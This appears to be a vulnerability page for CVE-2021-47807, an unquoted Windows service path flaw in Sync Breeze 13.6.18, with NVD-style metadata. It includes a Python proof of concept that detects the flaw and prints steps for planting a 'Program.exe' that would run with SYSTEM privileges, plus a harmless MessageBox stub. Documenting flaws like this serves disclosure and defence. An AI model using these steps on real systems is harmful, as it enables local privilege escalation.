CVE-2021-47807

#!/usr/bin/env python3 # CVE-2021-47807 PoC - Sync Breeze Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in Sync Breeze 13.6.18 # Author: Security Researcher # Reference: https://www.vulncheck.com/advisories/sync-breeze-multiple-unquoted-service-path import os import sys import subprocess import shutil def check_vulnerability(): """Check if Sync Breeze service has unquoted path vulnerability""" try: # Query the Sync Breeze service configuration result = subprocess.run( ['sc', 'qc', 'SyncBreezeService'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: # Extract the binary path for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split('=', 1)[1].strip() print(f"[+] Service Binary Path: {path}") # Check if path is quoted if not (path.startswith('"') and path.endswith('"')): print("[!] VULNERABLE: Path is not quoted!") print("[!] Exploitable path locations:") # Parse path components parts = path.split('\\') for i, part in enumerate(parts[:-1]): potential_path = '\\'.join(parts[:i+1]) + '.exe' print(f" - {potential_path}") return True else: print("[-] Path is properly quoted, not vulnerable") return False else: print("[-] Sync Breeze service not found") return False except Exception as e: print(f"[-] Error checking vulnerability: {e}") return False def create_malicious_executable(target_path): """Create a malicious executable to demonstrate privilege escalation""" try: # Create a simple malicious executable (reverse shell stub) malicious_code = f''' #include <windows.h> #include <stdio.h> int main() {{ MessageBox(NULL, "Sync Breeze Exploited!\nCheck {target_path}", "CVE-2021-47807", MB_OK); // Add malicious code here return 0; }} ''' print(f"[*] Malicious executable would be placed at: {target_path}") print("[*] When service restarts, this executable will be executed with SYSTEM privileges") return True except Exception as e: print(f"[-] Error creating malicious executable: {e}") return False def main(): print("="*60) print("CVE-2021-47807 - Sync Breeze Unquoted Service Path Exploit") print("="*60) print("\n[*] Checking for vulnerability...") if check_vulnerability(): print("\n[!] Target is VULNERABLE to CVE-2021-47807") print("\n[*] Exploitation steps:") print(" 1. Create malicious executable named 'Program.exe'") print(" 2. Place it in C:\\ root directory") print(" 3. Wait for service restart or system reboot") print(" 4. Malicious code executes with SYSTEM privileges") else: print("\n[-] Target is NOT vulnerable or service not found") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47807", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:25.520", "lastModified": "2026-01-30T00:54:14.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sync Breeze 13.6.18 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in service binaries located in 'Program Files' directories to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "Sync Breeze 13.6.18 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio de Windows que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden exploit la ruta sin comillas en los binarios del servicio ubicados en directorios de 'Archivos de programa' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flexense:sync_breeze:13.6.18:*:*:*:*:*:*:*", "matchCriteriaId": "2ADFE910-0C0E-4419-9812-7F3600A2A819"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50023", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.syncbreeze.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/sync-breeze-multiple-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50023", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}